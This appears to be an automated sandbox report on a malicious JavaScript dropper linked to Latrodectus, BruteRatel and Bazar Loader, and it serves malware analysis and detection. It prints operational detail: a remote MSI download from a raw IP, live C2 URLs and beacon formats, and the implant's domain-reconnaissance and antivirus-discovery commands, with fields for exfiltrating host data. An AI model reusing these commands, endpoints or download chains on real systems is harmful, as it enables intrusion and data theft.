Windows Analysis Report
Document-18-33-08.js

Overview

General Information

Sample name: Document-18-33-08.js
Analysis ID: 1525184
MD5: c05645ed2ec3ff5c541b99d20011a488
SHA1: 6822c03f0781ac932c31747610f1fe1039f6861f
SHA256: a9a4640e3887e4ee71ae0e0624afa6b8fa6a22cdffd190f1d83234109dd8496d
Tags: BruteRatel, js, user-k3dg3___

Detection

Bazar Loader, BruteRatel, Latrodectus
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Bazar Loader
Yara detected BruteRatel
Yara detected Latrodectus
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Drops executables to the windows directory (C:\Windows) and starts them
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Sample has a suspicious name (potential lure to open the executable)
Sample uses string decryption to hide its real strings
Sets debug register (to hijack the execution of another thread)
Sigma detected: RunDLL32 Spawning Explorer
Sigma detected: WScript or CScript Dropper
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript install MSI file from remote location
Checks for available system drives (often done to infect USB drives)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic

Classification

  • System is w10x64
  • wscript.exe (PID: 984 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document-18-33-08.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • msiexec.exe (PID: 768 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 3228 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 3D862CBB7D25098EF2F446AEAACF52B4 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • MSIF29D.tmp (PID: 1848 cmdline: "C:\Windows\Installer\MSIF29D.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState MD5: B9545ED17695A32FACE8C3408A6A3553)
      • rundll32.exe (PID: 2924 cmdline: "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState MD5: 889B99C52A60DD49227C5E485A016679)
        • rundll32.exe (PID: 5880 cmdline: "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState MD5: EF3179D498793BF4234F708D3BE28633)
          • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
Name: Brute Ratel C4, BruteRatel
Description: Brute Ratel C4 (BRC4) is a commercial framework for red-teaming and adversarial attack simulation, which made its first appearance in December 2020. It was specifically designed to evade detection by endpoint detection and response (EDR) and antivirus (AV) capabilities. BRC4 allows operators to deploy a backdoor agent known as Badger (aka BOLDBADGER) within a target environment. This agent enables arbitrary command execution, facilitating lateral movement, privilege escalation, and the establishment of additional persistence avenues. The Badger backdoor agent can communicate with a remote server via DNS over HTTPS, HTTP, HTTPS, SMB, and TCP, using custom encrypted channels. It supports a variety of backdoor commands including shell command execution, file transfers, file execution, and credential harvesting. Additionally, the Badger agent can perform tasks such as port scanning, screenshot capturing, and keystroke logging. Notably, in September 2022, a cracked version of Brute Ratel C4 was leaked in the cybercriminal underground, leading to its use by threat actors.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.brute_ratel_c4

Name: Latrodectus, Latrodectus
Description: First discovered in October 2023, BLACKWIDOW is a backdoor written in C that communicates over HTTP using RC4 encrypted requests. The malware has the capability to execute discovery commands, query information about the victim's machine, update itself, as well as download and execute an EXE, DLL, or shellcode. The malware is believed to have been developed by LUNAR SPIDER, the creators of IcedID (aka BokBot) Malware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.latrodectus
{"C2 url": ["https://isomicrotich.com/test/", "https://opewolumeras.com/test/"], "Group Name": "Alpha", "Campaign ID": 55079499}
Source | Rule | Description | Author
00000006.00000002.3332076257.000001FF4AE58000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BruteRatel_2 | Yara detected BruteRatel | Joe Security
00000006.00000003.2444968399.000001FF4CA6D000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BruteRatel_1 | Yara detected BruteRatel | Joe Security
00000008.00000002.3353267482.000000000E6CB000.00000004.00000010.00020000.00000000.sdmp | JoeSecurity_Latrodectus | Yara detected Latrodectus | Joe Security
00000006.00000002.3332247627.000001FF4B020000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Bazar_2 | Yara detected Bazar Loader | Joe Security
00000006.00000002.3332368718.000001FF4B0A0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Bazar_2 | Yara detected Bazar Loader | Joe Security

Source | Rule | Description | Author
6.2.rundll32.exe.1ff4b020000.3.raw.unpack | JoeSecurity_Bazar_2 | Yara detected Bazar Loader | Joe Security
6.2.rundll32.exe.1ff4b0a0000.5.unpack | JoeSecurity_Bazar_2 | Yara detected Bazar Loader | Joe Security
6.2.rundll32.exe.1ff4b0a0000.5.raw.unpack | JoeSecurity_Bazar_2 | Yara detected Bazar Loader | Joe Security

                  System Summary

                  Source: Process started; Author: elhoim, CD_ROM_; Data: Command: C:\Windows\Explorer.EXE, CommandLine: C:\Windows\Explorer.EXE, CommandLine|base64offset|contains: , Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 5880, ParentProcessName: rundll32.exe, ProcessCommandLine: C:\Windows\Explorer.EXE, ProcessId: 1028, ProcessName: explorer.exe
                  Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document-18-33-08.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document-18-33-08.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document-18-33-08.js", ProcessId: 984, ProcessName: wscript.exe
                  Source: Network Connection; Author: frack113; Data: DestinationIp: 188.119.112.7, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\msiexec.exe, Initiated: true, ProcessId: 768, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49704
                  Source: Process started; Author: Michael Haag; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document-18-33-08.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document-18-33-08.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document-18-33-08.js", ProcessId: 984, ProcessName: wscript.exe
                  Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                  2024-10-03T20:44:05.187319+0200 | 2048735 | 1 | A Network Trojan was detected | 192.168.2.5 | 50048 | 188.114.96.3 | 443 | TCP
                  2024-10-03T20:44:08.857690+0200 | 2048735 | 1 | A Network Trojan was detected | 192.168.2.5 | 50050 | 188.114.96.3 | 443 | TCP
                  2024-10-03T20:44:10.117125+0200 | 2048735 | 1 | A Network Trojan was detected | 192.168.2.5 | 50051 | 188.114.96.3 | 443 | TCP
                  2024-10-03T20:44:14.824356+0200 | 2048735 | 1 | A Network Trojan was detected | 192.168.2.5 | 50053 | 188.114.96.3 | 443 | TCP

                  AV Detection

                  Source: 8.0.explorer.exe.3050000.0.unpackMalware Configuration Extractor: Latrodectus {"C2 url": ["https://isomicrotich.com/test/", "https://opewolumeras.com/test/"], "Group Name": "Alpha", "Campaign ID": 55079499}
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: /c ipconfig /all
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: /c systeminfo
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: /c nltest /domain_trusts
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: /c net view /all
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: /c nltest /domain_trusts /all_trusts
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: /c net view /all /domain
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: &ipconfig=
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: /c net group "Domain Admins" /domain
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: C:\Windows\System32\wbem\wmic.exe
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: /c net config workstation
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: /c whoami /groups
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: &systeminfo=
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: &domain_trusts=
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: &domain_trusts_all=
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: &net_view_all_domain=
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: &net_view_all=
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: &net_group=
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: &wmic=
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: &net_config_ws=
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: &net_wmic_av=
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: &whoami_group=
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: "pid":
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: "%d",
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: "proc":
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: "%s",
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: "subproc": [
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: &proclist=[
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: "pid":
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: "%d",
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: "proc":
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: "%s",
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: "subproc": [
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: &desklinks=[
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: *.*
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: "%s"
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: Update_%x
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: Custom_update
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: .dll
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: .exe
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: Error
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: runnung
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: %s/%s
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: front
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: /files/
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: Alpha
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: Content-Type: application/x-www-form-urlencoded
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: Cookie:
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: POST
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: GET
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: curl/7.88.1
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: CLEARURL
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: URLS
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: COMMAND
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: ERROR
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: VHzTOEx62sr5cYaQrGJbsm05R2gZwO1VTkHTNfF8DAm5aNNw1n
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: [{"data":"
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: "}]
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: &dpost=
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: https://isomicrotich.com/test/
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: https://opewolumeras.com/test/
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: \*.dll
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: AppData
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: Desktop
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: Startup
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: Personal
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: Local AppData
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: %s%d.dll
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: <!DOCTYPE
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: Content-Length: 0
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: <html>
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: Content-Type: application/dns-message
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: Content-Type: application/ocsp-request
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: 12345
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: 12345
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: &stiller=
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: %s%d.exe
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: %x%x
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: &mac=
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: %02x
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: :%02x
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: &computername=%s
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: &domain=%s
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: %04X%04X%04X%04X%08X%04X
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: LogonTrigger
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: %04X%04X%04X%04X%08X%04X
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: \Registry\Machine\
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: TimeTrigger
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: PT0H%02dM
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: %04d-%02d-%02dT%02d:%02d:%02d
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: PT0S
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: \update_data.dat
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50048 version: TLS 1.2
                  Source: Binary string: kernel32.pdbUGP source: rundll32.exe, 00000006.00000003.2069928053.000001FF4C9D1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: kernelbase.pdbUGP source: rundll32.exe, 00000006.00000003.2067028655.000001FF4CAD7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\BUILD\work\b69487f8af4577da\BUILDSENG\Release\x64\ArPotEx64.pdb source: rundll32.exe, 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmp, vierm_soft_x64.dll.1.dr
                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSIF29D.tmp, 00000004.00000000.2061647641.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp, MSIF29D.tmp, 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp, MSI7623.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr
                  Source: Binary string: ntdll.pdb source: rundll32.exe, 00000006.00000003.2066566980.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: kernel32.pdb source: rundll32.exe, 00000006.00000003.2069928053.000001FF4C9D1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000006.00000003.2066566980.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF160.tmp.1.dr
                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF160.tmp.1.dr
                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSIF29D.tmp, 00000004.00000000.2061647641.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp, MSIF29D.tmp, 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp, MSI7623.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr
                  Source: Binary string: kernelbase.pdb source: rundll32.exe, 00000006.00000003.2067028655.000001FF4CAD7000.00000004.00000020.00020000.00000000.sdmp
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: 4_2_00FEAF79 FindFirstFileExW,4_2_00FEAF79
                  Source: C:\Windows\explorer.exeCode function: 8_2_0305A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,8_2_0305A8E0
                  Source: C:\Windows\explorer.exeCode function: 8_2_03052B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,8_2_03052B28
                  Source: C:\Windows\explorer.exeCode function: 8_2_030604C0 FindFirstFileW,8_2_030604C0

                  Networking

                  Source: Network traffic; Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50053 -> 188.114.96.3:443
                  Source: Network traffic; Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50048 -> 188.114.96.3:443
                  Source: Network traffic; Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50050 -> 188.114.96.3:443
                  Source: Network traffic; Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50051 -> 188.114.96.3:443
                  Source: C:\Windows\System32\rundll32.exe; Network Connect: 82.115.223.39 8041
                  Source: C:\Windows\explorer.exe; Network Connect: 188.114.96.3 443
                  Source: C:\Windows\System32\rundll32.exe; Network Connect: 80.78.24.30 8041
                  Source: Malware configuration extractor; URLs: https://isomicrotich.com/test/
                  Source: Malware configuration extractor; URLs: https://opewolumeras.com/test/
                  Source: http://188.119.112.7/das.msi | IID Installer: C:\Windows\System32\wscript.exe
                  Source: global traffic | TCP traffic: 192.168.2.5:49705 -> 80.78.24.30:8041
                  Source: global traffic | TCP traffic: 192.168.2.5:49708 -> 82.115.223.39:8041
                  Source: Joe Sandbox View | IP Address: 188.114.96.3
                  Source: Joe Sandbox View | IP Address: 82.115.223.39
                  Source: Joe Sandbox View | IP Address: 80.78.24.30
                  Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
                  Source: Joe Sandbox View | ASN Name: MIDNET-ASTK-TelecomRU
                  Source: Joe Sandbox View | ASN Name: CYBERDYNELR
                  Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: global traffic | HTTP traffic detected: POST /test/ HTTP/1.1; Accept: */*; Content-Type: application/x-www-form-urlencoded; Cookie: kALB+jBIcqFh9baN0mUbkry70/OBhj9kRFFApZBql4EawZnSN3QqrUnsIQw7QdOqesy9dmntVXFHGxw5Mv+gazRt6m8J8V5Hg/GvY9DvAc6Ya81lXDJyArkIA11NUownH3IB6Y0gtSx3OHp9NFR/n0+B0klqqp57yBUl1vBMDU1wr4wR8ps=; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1); Host: isomicrotich.com; Content-Length: 92; Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: POST /test/ HTTP/1.1; Accept: */*; Content-Type: application/x-www-form-urlencoded; Cookie: kALB+jBIcqFg9baN0mUbkry70/OBhj9kRFFApZBql4EawZnSN3QqrUnsIQw7QdOqesy9dmntVXFHGxw5Mv+gazRt6m8J8V5Hg/GvY9DvAc6Ya81lXDJyArkIA11NUownH3IB6Y0gtSx3OHp9NFR/n0+B0klqqp57yBUl1vBMDU1wr4wR8ps=; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1); Host: isomicrotich.com; Content-Length: 0; Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: POST /test/ HTTP/1.1; Accept: */*; Content-Type: application/x-www-form-urlencoded; Cookie: kALB+jBIcqFj9baN0mUbkry70/OBhj9kRFFApZBql4EawZnSN3QqrUnsIQw7QdOqesy9dmntVXFHGxw5Mv+gazRt6m8J8V5Hg/GvY9DvAc6Ya81lXDJyArkIA11NUownH3IB6Y0gtSx3OHp9NFR/n0+B0klqqp57yBUl1vBMDU1wr4wR8ps=; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1); Host: isomicrotich.com; Content-Length: 0; Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: POST /test/ HTTP/1.1; Accept: */*; Content-Type: application/x-www-form-urlencoded; Cookie: kALB+jBIcqFi9baN0mUbkry70/OBhj9kRFFApZBql4EawZnSN3QqrUnsIQw7QdOqesy9dmntVXFHGxw5Mv+gazRt6m8J8V5Hg/GvY9DvAc6Ya81lXDJyArkIA11NUownH3IB6Y0gtSx3OHp9NFR/n0+B0klqqp57yBUl1vBMDU1wr4wR8ps=; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1); Host: isomicrotich.com; Content-Length: 0; Cache-Control: no-cache
                  Source: unknown | TCP traffic detected without corresponding DNS query: 188.119.112.7
                  Source: C:\Windows\explorer.exe | Code function: 8_2_03055078 InternetReadFile,8_2_03055078
                  Source: global traffic | HTTP traffic detected: GET /das.msi HTTP/1.1; Connection: Keep-Alive; Accept: */*; User-Agent: Windows Installer; Host: 188.119.112.7
                  Source: global traffic | DNS traffic detected: DNS query: bazarunet.com
                  Source: global traffic | DNS traffic detected: DNS query: greshunka.com
                  Source: global traffic | DNS traffic detected: DNS query: tiguanin.com
                  Source: global traffic | DNS traffic detected: DNS query: isomicrotich.com
                  Source: unknown | HTTP traffic detected: POST /test/ HTTP/1.1; Accept: */*; Content-Type: application/x-www-form-urlencoded; Cookie: kALB+jBIcqFh9baN0mUbkry70/OBhj9kRFFApZBql4EawZnSN3QqrUnsIQw7QdOqesy9dmntVXFHGxw5Mv+gazRt6m8J8V5Hg/GvY9DvAc6Ya81lXDJyArkIA11NUownH3IB6Y0gtSx3OHp9NFR/n0+B0klqqp57yBUl1vBMDU1wr4wR8ps=; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1); Host: isomicrotich.com; Content-Length: 92; Cache-Control: no-cache
                  Source: rundll32.exe, 00000006.00000003.2253330460.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/f
                  Source: rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/in.com:8041/admin.php
                  Source: rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/net.com:8041/admin.phpf
                  Source: rundll32.exe, 00000006.00000003.3011956610.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/net.com:8041/bazar.php
                  Source: rundll32.exe, 00000006.00000003.2253330460.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/zar.php
